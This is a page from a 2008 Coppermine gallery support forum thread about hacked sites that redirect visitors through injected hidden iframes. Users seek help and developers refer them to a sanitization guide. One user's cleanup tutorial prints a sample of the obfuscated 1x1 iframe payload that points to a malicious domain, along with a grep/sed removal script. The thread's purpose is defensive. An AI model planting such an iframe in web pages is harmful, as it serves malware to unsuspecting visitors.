Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: 1 ... 9 10 11 12 [13] 14 15   Go Down

Author Topic: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?  (Read 320718 times)

0 Members and 1 Guest are viewing this topic.

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #240 on: April 24, 2008, 05:13:34 pm »

Sanitization thread? I didn't find it...

http://forum.coppermine-gallery.net/index.php/topic,51671.msg253223.html#msg253223 <-- Should i use it? Will it fix my problem?
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #241 on: April 24, 2008, 06:23:42 pm »

As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site. I have started a thread named "Yikes, I've been hacked! Now what?" and locked it on posting to avoid it from getting cluttered similarly to this one. HTH

Joachim
Logged

Understudy

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 51
    • Another boring website
Iframe Exploits tutorial
« Reply #242 on: April 25, 2008, 01:32:56 am »

Please note the latest version of coppermine covers this issue. If you haven't updated it's your own fault.
Note this describes me working on a FreeBSD server. I suppose it will also work on a Linux Server. Windows I have no idea.

With the recent exploit on mysql and my own concerns for security. I figured I would help out those who are not 24/7 sys admins.

The exploit caused some out there to be hijacked by snot nosed script kiddies who put nasty things in coppermine pages and made life miserable for windoze users who are affected by every virus out there.

The script would be placed in an iframe tag with a wierd numbered picture.
You can find by going to your coppermine directory and running this command:
grep -r 'iframe src' *
If you see something like this:
albums/userpics/10001/45563131x.jpg:echo <iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>
It could be bad.

You could also discover it by doing this:
lynx -dump http://foo.com/copperminedirectory/thumbnails.php?album=XXX (where XXX is the number of an  album)

Lynx is a *nix based text browser.

You would see in the output something like this:
References

   Visible links
   1. http://flboioawone.com  <-- not a real link. The gibberish type URL is what you are looking for.

What you want to make note of is the numbered .jpg (45563131x.jpg shown under the grep command) and the wierd url shown under the lynx command.

Both of these would be signs that someone who still lives in mom's basement exploited a vulnerability.

You job is to remove them.

How do we do that.
Coppermine has a nice shell script.
#!/bin/sh
grep -rl '<iframe src="&#104;' . > /tmp/l

for i in $(grep '\.php$' /tmp/l); do
  cp $i $i.corr
  sed "s/<?php echo '<iframe.*<\/iframe>'; ?>//g" $i.corr > $i
done

for i in $(grep '\.html\?$' /tmp/l); do
  cp $i $i.corr;
  sed 's/<iframe src="&#104;.*<\/iframe>//g' $i.corr > $i
done

for i in $(cat /tmp/l); do
  test -f $i.corr && rm $i.corr || echo TODO: $i
done

But you will note that I needed to modify mine
I had '&#104 in my iframes not "&#104. So I had to modify the script a little.

Save the script in your coppermine directory with a nice name like dieiframe and chmod +x then run ./dieiframe and see what the results are.

Run grep -r 'iframe src' * to be sure.
You can also rm -i 45563131x.jpg where ever you find it but that can be tedious. (not your number may be different).

You should also change your login password for admin and users just to be safe.

Sincerely,
Brendhan

Logged

Understudy

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 51
    • Another boring website
Re: Iframe Exploits tutorial
« Reply #243 on: April 25, 2008, 05:42:34 am »

correcting a typo:
You can also rm -i 45563131x.jpg where ever you find it but that can be tedious. (not your number may be different).

Should read
You can also rm -i 45563131x.jpg where ever you find it but that can be tedious. (note your number may be different).

Sincerely,
Brendhan
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Iframe Exploits tutorial
« Reply #244 on: April 25, 2008, 07:00:11 am »

Thanks for your readiness to share.
Why this is not valid: the iframe injection is the payload of the hack - it will/may differ, as the attack pattern of the hack varies. Might work for you, may or may not work for others. Merging with the thread that deals with the hack.
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #245 on: April 25, 2008, 06:25:01 pm »

OMG :( It didn't help! I did what you told:

Upgrade to 4.18 and then do things in "Yikes, my sites has been hacked!"

and now look: http://gallery.tatushow.com/ :( There's still this stupid iframe with viruses! :(
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #246 on: April 25, 2008, 06:45:05 pm »

And i still can't upload the pictures..
Logged

François Keller

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9096
  • aka Frantz
    • Ma galerie
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #247 on: April 25, 2008, 06:52:12 pm »

Quote
Upgrade to 4.18 and then do things in "Yikes, my sites has been hacked!"
surely not. Sanitize your install by looking in the album folder for unexpected files (.zip files etc...) and for infected files (look in all files if you have the virus code who start with <iframe>.
They are plenty threads dealing with this problem.
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #248 on: April 25, 2008, 07:00:59 pm »

Upgrade to 4.18 and then do things in "Yikes, my sites has been hacked!"
No, that's not what I said. The thread "Yikes, my sites has been hacked" contains all instructions you need. If you do exactly as suggested there, the upgrade will be performed and your site will be sanitized. Guaranteed. You failed to do as suggested there. Nobody said that you need to upgrade and then perform "Yikes". See how you read advice? Read it carefully.
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #249 on: April 25, 2008, 07:09:55 pm »

I really read it carefully, i did all things many times to be sure! i read it 32232323232 times to be sure! I do everything word by word... After upgrading there weren't mistakes, so i "include" subfolders, and i checked all folders, i deleted 45563131x.jpg + iframes and it's still there! :(
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #250 on: April 25, 2008, 07:25:21 pm »

OMG:( So what i have to do now? If i upgraded that...? :(
Logged

tfischer

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 75
    • Fischersplace Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #251 on: April 25, 2008, 07:27:18 pm »

i read it 32232323232 times to be sure! <snip> i deleted 45563131x.jpg + iframes and it's still there! :(

Now you're just being sarcastic, which doesn't lend people's sympathy to your cause...

-Tim
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #252 on: April 25, 2008, 07:30:04 pm »

I posted it without reading last post, sorry... now i realised... So i upgraded my gallery without firstly doing "Yikes, my site has been hacked"... What i have to do now to safe my gallery? :(
Logged

tfischer

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 75
    • Fischersplace Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #253 on: April 25, 2008, 07:55:11 pm »

I posted it without reading last post, sorry... now i realised... So i upgraded my gallery without firstly doing "Yikes, my site has been hacked"... What i have to do now to safe my gallery? :(

Same thing that you've been told over and over and over (perhaps 32232323232 times):  READ and FOLLOW the information in "Yikes, my site has been hacked".  There are no shortcuts, there are no magic cures. 

-Tim
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #254 on: April 25, 2008, 07:59:35 pm »

But it will make sense? Because you know, i've upgraded my gallery to 1.4.18 FIRST, and then i did Yikes, my site has been hacked... So there's nothing bad? If i do things which were written in Yikes, my sites been hacked, then it will work?
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #255 on: April 25, 2008, 08:36:00 pm »

Yes, as you have been told now several times.  ::)
Now stop whining and just do as suggested >:(. If you're not able to perform this simple set of instructions, hire someone to do the job for you, as suggested in "Yikes" as well.
Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #256 on: April 25, 2008, 08:42:51 pm »

OOOKKK :D Sorry for interrupting... :( So now i'll do this, even if my gallery was upgraded...
Logged

kromnaios

  • Coppermine newbie
  • Offline Offline
  • Gender: Male
  • Posts: 16
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #257 on: April 27, 2008, 01:05:08 pm »

Hello. I use coppermine-gallery in 2 sites and it is hacked for second time in three weeks. The first time i upgraded to 1.4.17. Now, it is again hacked on both sites. In one of these, everything is hacked (all the pages, forum, guestbook, gallery) with the iframe tag. I will restore the whole site and upgrade the gallery to 1.4.18. But then, will the gallery be safe or we could have problem again? Is it sure, that 1.4.18 is not vulnerable?
Logged

Understudy

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 51
    • Another boring website
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #258 on: April 27, 2008, 01:33:23 pm »

Hello. I use coppermine-gallery in 2 sites and it is hacked for second time in three weeks. The first time i upgraded to 1.4.17. Now, it is again hacked on both sites. In one of these, everything is hacked (all the pages, forum, guestbook, gallery) with the iframe tag. I will restore the whole site and upgrade the gallery to 1.4.18. But then, will the gallery be safe or we could have problem again? Is it sure, that 1.4.18 is not vulnerable?
Read http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

And yes 1.4.18 covers the issue. You should also change your passwords.

Sincerely,
Brendhan

Logged

luzma

  • Coppermine newbie
  • Offline Offline
  • Posts: 2
Virus on the page of Coppermine
« Reply #259 on: April 27, 2008, 06:05:46 pm »

Hi,

I have installed coppermine 1.4.10 and It was working fine, but now I don't know what happened because when I open the page: http://www.astrocaat.it/cpg1410/index.php it wants to connect to other site and friends said me that their antivirus detect a virus in this page.

I don't know how resolve the problem, I put on the website the page index.php that I had on my computer but is the same, I haven't an actual backup of the Gallery to put on the website.

Have you seen this problem before ? Can you give me any suggestion ?

Thanks in advance,

Luz Marina
Logged
Pages: 1 ... 9 10 11 12 [13] 14 15   Go Up
 

Page created in 0.041 seconds with 20 queries.